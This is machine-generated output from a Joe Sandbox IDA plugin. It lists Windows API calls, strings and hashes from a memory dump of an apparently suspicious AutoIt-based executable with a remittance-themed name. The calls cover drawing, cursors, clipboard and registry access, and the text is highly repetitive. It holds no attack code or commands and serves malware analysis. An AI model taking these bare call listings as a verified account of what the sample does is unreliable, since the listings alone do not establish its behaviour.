                                                                      • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                                      • API String ID: 4040870279-2373415609
                                                                      • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                      • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                                      • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                      • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                                      APIs
                                                                      • GetSysColor.USER32(00000012), ref: 0044181E
                                                                      • SetTextColor.GDI32(?,?), ref: 00441826
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                                      • GetSysColor.USER32(0000000F), ref: 00441849
                                                                      • SetBkColor.GDI32(?,?), ref: 00441864
                                                                      • SelectObject.GDI32(?,?), ref: 00441874
                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                                      • GetSysColor.USER32(00000010), ref: 004418B2
                                                                      • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                                      • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                                      • DeleteObject.GDI32(?), ref: 004418D5
                                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                                      • FillRect.USER32(?,?,?), ref: 00441970
                                                                        • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                                        • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                        • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                        • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                                        • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                                        • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                        • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                        • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                                        • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                                        • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                        • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                        • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                        • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                      • String ID:
                                                                      • API String ID: 69173610-0
                                                                      • Opcode ID: 0916c3cf28f962cebf3c58740b3ff5bfe8190551d5af4ba49c76a685ec03c0b9
                                                                      • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                                      • Opcode Fuzzy Hash: 0916c3cf28f962cebf3c58740b3ff5bfe8190551d5af4ba49c76a685ec03c0b9
                                                                      • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                                      APIs
                                                                      • DestroyWindow.USER32(?), ref: 004590F2
                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                                      • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                                      • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                                      • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                                      • GetStockObject.GDI32(00000011), ref: 004592AC
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                                      • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                                      • DeleteDC.GDI32(00000000), ref: 004592D6
                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                                      • GetStockObject.GDI32(00000011), ref: 004593D3
                                                                      • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                                      • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                      • API String ID: 2910397461-517079104
                                                                      • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                      • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                                      • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                      • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: __wcsnicmp
                                                                      • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                      • API String ID: 1038674560-3360698832
                                                                      • Opcode ID: 60e7c0ccc2de36542d37a783a5f9e034653244a609c45985bfd1ff28648e5169
                                                                      • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                                      • Opcode Fuzzy Hash: 60e7c0ccc2de36542d37a783a5f9e034653244a609c45985bfd1ff28648e5169
                                                                      • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                                                      APIs
                                                                      • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                                      • SetCursor.USER32(00000000), ref: 0043075B
                                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                                      • SetCursor.USER32(00000000), ref: 00430773
                                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                                      • SetCursor.USER32(00000000), ref: 0043078B
                                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                                      • SetCursor.USER32(00000000), ref: 004307A3
                                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                                      • SetCursor.USER32(00000000), ref: 004307BB
                                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                                      • SetCursor.USER32(00000000), ref: 004307D3
                                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                                      • SetCursor.USER32(00000000), ref: 004307EB
                                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                                      • SetCursor.USER32(00000000), ref: 00430803
                                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                                      • SetCursor.USER32(00000000), ref: 0043081B
                                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                                      • SetCursor.USER32(00000000), ref: 00430833
                                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                                      • SetCursor.USER32(00000000), ref: 0043084B
                                                                      • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                                      • SetCursor.USER32(00000000), ref: 00430863
                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                                      • SetCursor.USER32(00000000), ref: 0043087B
                                                                      • SetCursor.USER32(00000000), ref: 00430887
                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                                      • SetCursor.USER32(00000000), ref: 0043089F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Cursor$Load
                                                                      • String ID:
                                                                      • API String ID: 1675784387-0
                                                                      • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                      • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                                      • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                      • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                                      APIs
                                                                      • GetSysColor.USER32(0000000E), ref: 00430913
                                                                      • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                      • GetSysColor.USER32(00000012), ref: 00430933
                                                                      • SetTextColor.GDI32(?,?), ref: 0043093B
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                      • GetSysColor.USER32(0000000F), ref: 00430959
                                                                      • CreateSolidBrush.GDI32(?), ref: 00430962
                                                                      • GetSysColor.USER32(00000011), ref: 00430979
                                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                      • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                      • SetBkColor.GDI32(?,?), ref: 004309A6
                                                                      • SelectObject.GDI32(?,?), ref: 004309B4
                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                      • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                                      • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                                      • GetSysColor.USER32(00000011), ref: 00430A9F
                                                                      • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                                      • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                                      • SelectObject.GDI32(?,?), ref: 00430AD0
                                                                      • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                                      • SelectObject.GDI32(?,?), ref: 00430AE3
                                                                      • DeleteObject.GDI32(?), ref: 00430AE9
                                                                      • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                                      • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                      • String ID:
                                                                      • API String ID: 1582027408-0
                                                                      • Opcode ID: 86b869e5b8bb6c2dba163effb8278b4f001f0824fd106c928e18bea154194c17
                                                                      • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                                      • Opcode Fuzzy Hash: 86b869e5b8bb6c2dba163effb8278b4f001f0824fd106c928e18bea154194c17
                                                                      • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                                      APIs
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                                      • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: CloseConnectCreateRegistry
                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                      • API String ID: 3217815495-966354055
                                                                      • Opcode ID: 7d529682ee5fc17807d9f1869fe525bc37d3a13623003215e7c5094f22c59936
                                                                      • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                                      • Opcode Fuzzy Hash: 7d529682ee5fc17807d9f1869fe525bc37d3a13623003215e7c5094f22c59936
                                                                      • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                                      APIs
                                                                      • GetCursorPos.USER32(?), ref: 004566AE
                                                                      • GetDesktopWindow.USER32 ref: 004566C3
                                                                      • GetWindowRect.USER32(00000000), ref: 004566CA
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                                      • DestroyWindow.USER32(?), ref: 00456746
                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                                      • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                                      • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                                      • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                                      • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                                      • IsWindowVisible.USER32(?), ref: 0045682C
                                                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                                      • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                                      • GetWindowRect.USER32(?,?), ref: 00456873
                                                                      • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                                      • CopyRect.USER32(?,?), ref: 004568BE
                                                                      • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                      • String ID: ($,$tooltips_class32
                                                                      • API String ID: 225202481-3320066284
                                                                      • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                      • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                                      • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                      • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                                      APIs
                                                                      • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                      • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                      • CloseClipboard.USER32 ref: 0046DD0D
                                                                      • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                      • CloseClipboard.USER32 ref: 0046DD41
                                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                      • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                      • CloseClipboard.USER32 ref: 0046DD99
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                      • String ID:
                                                                      • API String ID: 15083398-0
                                                                      • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                      • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                                      • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                      • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                                      APIs
                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                      • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                                      • GetClientRect.USER32(?,?), ref: 00471D05
                                                                      • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                                      • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                                      • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                                      • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                                      • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                                      • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                                      • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                                      • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                                      • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                                      • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                                      • GetClientRect.USER32(?,?), ref: 00471E8A
                                                                      • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                                      • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                                      • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                      • String ID: @$AutoIt v3 GUI
                                                                      • API String ID: 867697134-3359773793
                                                                      • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                                      • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                                      • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                                      • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
